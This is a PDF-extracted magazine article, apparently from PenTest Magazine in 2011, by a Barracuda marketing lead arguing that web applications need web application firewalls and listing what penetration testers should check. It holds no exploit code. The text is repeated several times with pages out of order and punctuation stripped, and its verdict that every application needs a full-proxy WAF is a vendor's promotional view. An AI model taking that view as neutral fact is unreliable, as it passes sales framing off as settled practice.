In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
They are currently being used by hackers on a grand scale as gateways into corporate networks Web Application Firewalls (WAFs)
make it a lot more difficult to penetrate networksIn most commercial and non-commercial areas the
internet has developed into an indispensible medium that offers users a huge number of interesting and important applications Information procurement of any kind buying services or products but also bank transactions and virtual official errands can be conducted easily and comfortably from the screen Waiting times are a thing of the past and while we used to have to search laboriously for information we now have the search engines that deliver the results in a matter of seconds And so browsers and the web today dominate the majority of daily procedures in both our private as well as working lives In order to facilitate all of these processes a broad range of applications is required that are provided more or less publically Their range extends from simple applications for searching for product information or forms up to complex systems for auctions product orders internet banking or processing quotations They even control access to the companyrsquos own intranet
A major reason for these rapid developments is the almost unlimited possibilities to simplify accelerate and make business processes more productive Most enterprises and public authorities also see the web as
an opportunity to make enormous cost savings benefit from additional competitive advantages and open up new business opportunities This requires a growing number of ndash and more powerful ndash applications that provide the internet user with the required functions as fast and simply as possible
Developers of such software programs are under enormous cost and time pressure An increasing number of companies want to use the functionality of these so-called web applications for their business processes and offer their products services and information as quickly as possible simply and in a variety of ways So guidelines for safe programming and release processes are usually not available or they are not heeded In the end this results in programming errors because major security aspects are deliberately disregarded or are simply forgotten The productive use usually follows soon after development without developers having checked the security status of the web applications sufficiently
Above all the common practice of adapting tried and tested technologies for developing web applications is dangerous without having subjected them to prior security and qualification tests In the belief that the existing network firewall would provide the required protection if possible weaknesses were to become apparent those responsible unwittingly grant access to systems within the corporate boundaries And thereby
First the Security Gate then the AirplaneWhat needs to be heeded when checking web applications
Anyone developing a new software program will usually have an idea of the features and functions that the program should master The subject of security is however often an afterthought But with web applications the backlash comes quickly because many are accessible for everyone worldwide
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APPLICATION CHECKING
Page 38 httppentestmagcom012011 (1) November Page 39 httppentestmagcom012011 (1) November
professional software engineering was not necessarily at the top of the agenda So web applications usually went into productive operation without any clear security standards Their security standard was based solely on how the individual developers rated this aspect and how high their respective knowledge was
The problem with more recent web applications Many offerings demand the integration of additional browser plug-ins and add-ons in order to facilitate the interaction in the first place or to make it dynamic These include for example Ajax and JavaScript While the browser was originally only a passive tool for viewing web sites it has now evolved into an autonomous active element and has actually become a kind of operating system for the plug-ins and add-ons But that makes the browser and its tools vulnerable The attackers gain access to the browser via infected web applications and as such to further systems and to their ownersrsquo or usersrsquo sensitive data
Some assume that an unsecured web application cannot cause any damage as long as it does not conduct any security-relevant functions or provide any sensitive data This is completely wrong The opposite is the case One single unsecured web application endangers the security of further systems that follow on such as application or database servers Equally wrong is the common misconception that the telecom providersrsquo security services would protect the data Providers are not responsible for a safe use of web applications regardless of where they are hosted Suppliers and operators of web applications are the ones who have the big responsibility here towards all those who use their applications one which they often do not fulfill
they disclose sensitive data and make processes vulnerable But conventional protection systems do not guard against apparently legitimate connections that attackers build up via web applications
As a result critical business processes that seemed secure within the corporate perimeter are suddenly freely accessible in the web Conventional security strategies such as network firewalls or Intrusion Prevention Systems are no longer expedient here Particularly in association with the web the security requirements for applications have a different focus and are much higher than for traditional network security The requirements of service providers who conduct security checks on business-critical systems with penetration tests should then also be respectively higher
While most companies in the meantime protect their networks to a relatively high standard the hackers have long since moved on to a different playing field They now take advantage of security loopholes in web applications There are several reasons for this Compared with the network level you donrsquot need to be highly skilled to use the internet This not only makes it easier to use legitimately but also encourages the malicious misuse of web applications In addition the internet also offers many possibilities for concealment and making action anonymous As a result the risk for attackers remains relatively low and so does the inhibition threshold for hackers
Many web applications that are still active today were developed at a time when awareness for application security in the internet had not yet been raised There were hardly any threat scenarios because the attackersrsquo focus was directed at the internal IT structure of the companies In the first years of web usage in particular
Figure 1 This model (based on Everett M Rogers adoption curve from ldquoDiffusion of innovationsrdquo) shows a time lag between the adoption of new technology and the securing of the new technology Both exhibit the similar Technology Adoption Lifecycle There is an inection point when a technology becomes widely enough accepted and therefore economically relevant for hackers resulting in a period of Peak Vulnerability Bottom line Security is an afterthought
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
How to Make a Web Application SecureThere are two ways of actually securing the data and processes that are connected to web applications The first way would be to program each application absolutely error-free under the required application conditions and security aspects according to predefined guidelines Companies would have to increase the security of older web applications to the required standards later
However this intention is generally doomed to failure from the outset because the later integration of security functions in an existing application is in most cases not only difficult but also above all expensive Another example a program that had until now not processed its inputs and outputs via centralized interfaces is to be enhanced to allow the data to be checked It is then not sufficient to just add new functions The developers must start by precisely analyzing the program and then making deep inroads into its basic structures This is not only tedious but also harbors the danger of making mistakes Another example is programs that do not just use the session attributes for authentification In this case it is not straightforward to update the session ID after logging in This makes the application susceptible for Session Fixation
If existing web applications display weak spots ndash and the probability is relatively high ndash then it should be clarified whether it makes business sense to correct them It should not be forgotten here that other systems are put at risk by the unsecured application A risk analysis can bring clarity whether and to what extent the problems must be resolved or if further measures should be taken at the same time Often however the program developers are no longer available and training new developers as well as analyzing the web application results in additional costs
The situation is not much better with web applications that are to be developed from scratch There is no software program that ever went into productive operation free of errors or without weak spots The shortcomings are frequently uncovered over time And by this time correcting the errors is once again time-consuming and expensive In addition the application cannot be deactivated during this period if it works as a sales driver or as an important business process Despite this the demand for good code programming that sensibly combines effectiveness functionality and security still has top priority The safer a web application is written the lower the improvement work and the less complex the external security measures that have to be adopted
The second approach in addition to secure programming is the general safeguarding of web applications with a special security system from the time it goes into operation Such security systems are called Web Application Firewalls (WAF) and safeguard the operation of web applications
A WAF should protect web applications against attacks via the Hypertext Transfer Protocol (HTTP) As such it represents a special case of Application-Level-Firewalls (ALF) or Application-Level-Gateways (ALG) In contrast with classic firewalls and Intrusion Detection
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
systems (IDS) a WAF checks the communications at the application level Normally the web application to be protected does not have to be changed
Secure programming and WAFs are not contradictory but actually complement each other Analog to flight traffic it is without doubt important that the airplane (the application itself) is well serviced and safe But even the perfect airplane can never replace the security gate at the airport (the Web Application Firewall) which as the first security layer considerably minimizes the risks of attacks on any weak spots
After introducing a WAF it is still recommendable to check the security functions as conducted by Penetration Testers This might reveal for example that the system can be misused by SQL Injection by entering inverted commas It would be a costly procedure to correct this error in the web application If a WAF is also deployed as a protective system then this can be configured to filter the inverted commas out of the data traffic This simple example shows at the same time that it is not sufficient to just position a WAF in front of the web application without an analysis This would lead to misjudging the achieved security status Filtering out special characters does not always prevent an attack based on the SQL Injection principle Additionally the system performance would suffer as the security rules would have to be set as restrictively as possible in order to exclude all possible threats In this context too penetration tests make an important contribution to increasing the Web Application Security
WAF FunctionalityA major advantage of WAFs is that one single system can close the security loopholes for several web
applications If they are run in redundant mode they can also conduct load balancing functions in order to distribute data traffic better and increase the performance for the web applications With content caching functions they reduce the load on the backend web servers and via automated compression procedures they reduce the band width requirements of the client browser
In order to protect the web applications the WAFs filter the data flow between the browser and the web application If an entry pattern emerges here that is defined as invalid then the WAF interrupts the data transfer or reacts in a different way that has been predefined in the configuration diagram If for example two parameters have been defined for a monitored entry form then the WAF can block all requests that contain three or more parameters In this way the length and the contents of parameters can also be checked Many attacks can be prevented or at least made more difficult just by specifying general rules about the parameter quality such as their maximum length valid number of characters and permitted value area
Of course an integrated XML Firewall should also be the standard these days because increasingly more web applications are based on XML code This protects the web server from typical XML attacks such as nested elements or WSDL Poisoning A fully-developed rule for access numbers with finely adjustable guidelines also eliminates the negative consequences of Denial of Service or Brute Force attacks However every file that is uploaded to the web application can represent a danger if it contains a virus worm Trojan or similar A virus scanner integrated into the WAF checks every file before it is sent to the web application
Figure 2 An overview of how a Web Application Firewall works
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn their nature In this way these filters can ndash to a certain extent ndash automatically prevent malicious code from reaching the browser if for example a web application does not conduct sufficient checks of the original data Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters However in practice a whitelist only approach is quite cumbersome requiring constant re-learning if there are any changes to the application As a result whitelist only approaches quickly become out of date due to the constant tuning required to maintain the whitelist profiles However the contrary blacklist only approach offers attackers too many loopholes Consequently the ideal solution should rely on a combination of both whitelisting and blacklisting This can be made easy-to-use by using templated negative security profile (eg for standard usages like Outlook Web Access SharePoint or Oracle applications) augmented by a whitelist for high value sub-section like an order entry page
To prevent a high number of false positives some manufacturers provide an exception profiler This flags entries in possible violation of the policies but can still be categorized as legitimate based on an extensive heuristic analysis to the administrator At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from being repeated
Some WAFs provide different operating modes Bridge Mode (as Bridge Path) or Proxy Mode (as One-
Arm Proxy or Full Reverse Proxy) In Bridge Mode the WAF is used as an In-Line Bridge Path and works with the same address for the virtual IP and the backend server Although this configuration avoids changes to the existing network structure and as such can be integrated very easily and fast to protect an endangered web application Bridge Mode deployments sacrifice security and application acceleration for network simplicity Additionally this mode means that all data is passed on to the web application including potential attacks ndash even if the security checks have been conducted
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration as this is used in line and uses both of the systemrsquos physical ports (WAN and LAN) As a proxy WAFs have the capability to protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery which is not possible in Bridge Mode And only special functions are available here As a Full Reverse Proxy a WAF provides for example Instant SSL that converts http-pages into HTTPS without making changes to the code
Proxy WAFs also provide a whole range of further security functions They facilitate the translation of web addresses and as such the overwriting of URLs used by public requests to the web applicationrsquos hidden URL This means that the applicationrsquos actual web address remains cloaked With Proxy WAFs SSL is much faster and the response times for the web application can also be accelerated They also facilitate cloaking techniques Level 7 rules (to avoid Denial of Service attacks) as well as authentication and authorization Cloaking the concealment of onersquos
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
WEB APPLICATION CHECKING
Page 42 httppentestmagcom012011 (1) November Page 43 httppentestmagcom012011 (1) November
own IT infrastructure is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey By masking outgoing data protection can be obtained against data theft and Cookie-Security prevents identity theft But the Proxy-WAFs must also be configured to correspond with the respective terms Penetration tests help with the correct configuration
Demands on Penetration TestersWhen penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 20 This defines rules for distributing and storing Primary Account Number (PAN) information The companies are required to develop secure web applications and maintain them constantly Further points define formal risk checks and test processes that are intended to uncover high risk weak spots In order to check whether systems comply with PCI DSS penetration testers must heed the following requirements
bull Does the system have a Web Application Firewallbull Does the web traffic occur via a WAF Proxy
functionbull Are the web servers shielded against direct access
by attackersbull Is there a simple SSL encryption for the data traffic
even if the application or the server do not support this
bull Are all known and unknown threats blocked
A further point is the protection against data theft This involves checking whether the protection mechanism checks the outgoing data traffic for the possible withdrawal of sensitive data and then stops it
Penetration testers can fall back on web scanners to run security checks on web applications Several WAFs provide extra interfaces to automate tests
Since by its very nature a WAF stands on the frontline certain test criteria should be applied to it as well These include in particular the identity and access management In this context the principle of least privileges applies The users are only awarded those privileges on a need-to-have basis for their work or the use of the web application All other privileges are blocked A general integration of the WAF in Active Directory eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier
The user interface is also an especially critical point because it is the basis for safe WAF configuration Unintelligible or poorly structured user interfaces
lead to incorrect settings which cancel out the protective functions If by contrast the functions can be recorded intuitively are clearly displayed easy to understand and to set then this in practice makes the greatest contribution to system security A further plus is a user interface which is identical across several of the manufacturerrsquos products or even better a management center which administrators can use to manage numerous other network and security products with as well as the WAF The administrators can then rely on the known settings processes for security clusters This ensures that security configurations for each cluster are consistent across the organization An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account for the evaluation along with the consistency of security deployment across applications and sites
In summary any web application old or new needs to be secured by a WAF in Full Proxy Mode Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place It should also check whether it prevents the hacking of the application itself with common or new means whether it secures all the backend systems the application connects to and it stops leakage of sensitive data when the web application has weaknesses which the WAF cannot level out If penetration testers are not only looking for a security snap shot but want to help their customers in creating sustainable security they should always include the WAFrsquos administration into their assessment
OLIVER WAIOliver Wai leads product marketing for Barracudarsquos line of Web application security and application delivery product lines In his role Oliver is a core member of Barracudarsquos security incident response team and writes frequently about the latest application security threats Prior to Barracuda Networks Oliver held positions at Google Integration Appliance and Brocade Communications Oliver has an MS in Management Science amp Engineering from Stanford University and BS (Cum Laude) in Computer Engineering from Santa Clara University
In the upcoming issue of the
If you would like to contact Pentest team just send an email to enpentestmagcom We will reply immediately We will reply asap
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22th
trade
To Do Listhellip
nalyzing oftware ecurity tilizing isk valuationtrade
Scan code for more on the state of software security
Know your softwarersquos pedigree Get ASSUREtrade
Learn more about software security assurance by visiting or by calling +1 (678) 809-2100
- Cover13
- EDITORrsquoS NOTE
- CONTENTS
- CONTENTS 213
- The Significance Of HTTP And The Web For Advanced Persistent 13Threats
- Web 13Application Security and Penetration Testing
- Developersare from Venus Application Security guys from 13Mars
- Pulling the Legs of 13Arachni
- XSS Beef Metaspoilt 13Exploitation
- Cross-site Request Forgery 13IN-DEPTH ANALYSIS bull CYBER GATES bull 2011
- First the Security Gate then the Airplane What needs to be heeded when checking web 13applications
-
WEB APPLICATION CHECKING
Page 40 httppentestmagcom012011 (1) November Page 41 httppentestmagcom012011 (1) November
Web Applications Under FireThe security issues for web applications have not escaped the attackers and they have been exploiting these shortcomings in the IT environments for some time now There are numerous attack scenarios using which they can obtain access to corporate data and processes or even external systems via web applications For years now the major types have been
All injection attacks (such as SQL Injection Command Injection LDAP Injection Script Injection XPath Injection)
bull Cross Site Scripting (XSS)bull Hidden Field Tamperingbull Parameter Tamperingbull Cookie Poisoningbull Buffer Overflowbull Forceful Browsingbull Unauthorized access to web serversbull Search Engine Poisoning bull Social Engineering
The only more recent trend The attackers have recently started to combine the methods more often in order to obtain even higher success rates And here it is no longer just the large corporations who are targeted because they usually guard and conceal their systems better Instead an increasing number of smaller companies are now in the crossfire
One ExampleAttackers know that a certain commercial software program is widely used for shopping carts in online shops and that the smaller companies rarely patch the weak points They launch automated attacks in order to identify ndash with high efficiency ndash as many worthwhile targets as possible in the web In this step they already gather the required data about the underlying software the operating system or the database from web applications which give away information freely The attackers then only have to evaluate this information As such they have an extensive basis for later targeted attacks
